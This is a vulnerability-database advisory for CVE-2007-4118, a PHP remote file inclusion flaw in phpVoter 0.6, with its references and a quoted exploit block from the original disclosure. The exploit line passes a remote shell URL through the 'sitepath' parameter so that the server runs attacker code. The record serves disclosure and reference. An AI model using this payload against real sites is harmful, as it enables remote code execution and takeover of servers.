phpVoter 'includes/functions.inc.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID 1189598 Vulnerability type Unknown
Published 2007-08-01 Updated 2007-08-01
CVE ID CVE-2007-4118 CNNVD-ID CNNVD-200708-003
Platform N/A CVSS score 7.5
|Vulnerability source
https://www.securityfocus.com/bid/85500
https://cxsecurity.com/issue/WLB-2007080006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-003
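|Vulnerability details
A PHP remote file inclusion vulnerability exists in includes/functions.inc.php in phpVoter 0.6. A remote attacker can execute arbitrary PHP code via a URL in the sitepath parameter.
|Exploit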
# # # # # # # # # # # # # # # # # # # # # # # # #

# phpVoter v0.6 Remote File Include Vulnerability

# ilker kandemir <ilkerkandemir[at]mynet.com>

# Download: http://jxdevelopment.com/downloads/phpscripts/phpvoter-0_6.zip

# TnX.: Ajann, Dumenci, H0tTurk, Str0ke

# # # # # # # # # # # # # # # # # # # # # # # # #

# Exploit: includes/functions.inc.php?sitepath=http://shell.txt?

# # # # # # # # # # # # # # # # # # # # # # # # #
|Affected products
Jx Development Phpvoter 0.6
|References

Source: BUGTRAQ
Name: 20070730 phpVoter v0.6 Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/475100/100/0/threaded
Source: OSVDB
Name: 39030
Link: http://osvdb.org/39030
Source: XF
Name: phpvoter-functions-file-include(35691)
Link: http://xforce.iss.net/xforce/xfdb/35691
Source: SREASON
Name: 2939
Link: http://securityreason.com/securityalert/2939